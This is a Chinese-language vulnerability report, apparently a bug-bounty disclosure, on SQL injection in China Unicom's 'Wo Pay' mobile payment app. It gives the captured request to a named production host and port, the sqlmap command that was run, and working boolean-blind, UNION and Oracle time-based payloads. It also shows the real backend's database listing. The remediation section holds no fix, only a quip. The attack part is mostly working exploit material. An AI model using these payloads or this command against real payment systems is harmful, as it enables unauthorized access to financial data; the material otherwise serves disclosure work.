打开从豌豆荚应用商店下载的"沃支付"APP，抓包发现这么一条请求code 区域POST /payFront2/recommend.action?operation=CX10 HTTP/1.1

content-type: text/xml

Accept-Charset: GB2312

contentType: GB2312

SignatureCharacter: c691b17a0cf059741addc0a597ed1789f2593f0d

CookieSafeStr: -1|b12e9d62f3fd2fd5cc993b765fc47e28

User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.2.2; virtual machine Build/JDQ39E)

Host: cellphonefront.unicompayment.com:55352

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 334

<?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0*0000000000000002CX10main

其中，2.1.0参数存在SQL注射。漏洞证明：

code 区域sqlmap.py -r e:\1.txt --force-ssl --skip-urlencode --dbs

code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: (custom) POST

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 1553=1553 AND 'gdbh'='gdbh0000000000000002CX10main

Type: UNION query

Title: Generic UNION query (NULL) - 7 columns

Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(111)||CHR(115)||CHR(105)||CHR(113)||CHR(72)||CHR(107)||CHR(72)||CHR(75)||CHR(84)||CHR(65)||CHR(72)||CHR(77)||CHR(86)||CHR(80)||CHR(113)||CHR(104)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL FROM DUAL-- 0000000000000002CX10main

Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 6395=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'KtUw'='KtUw0000000000000002CX10main

---

back-end DBMS: Oracle

available databases [6]:

[*] CELLPHONE_FRONT

[*] EXFSYS

[*] MDSYS

[*] SYS

[*] SYSTEM

[*] XDB

修复方案：

联通更专业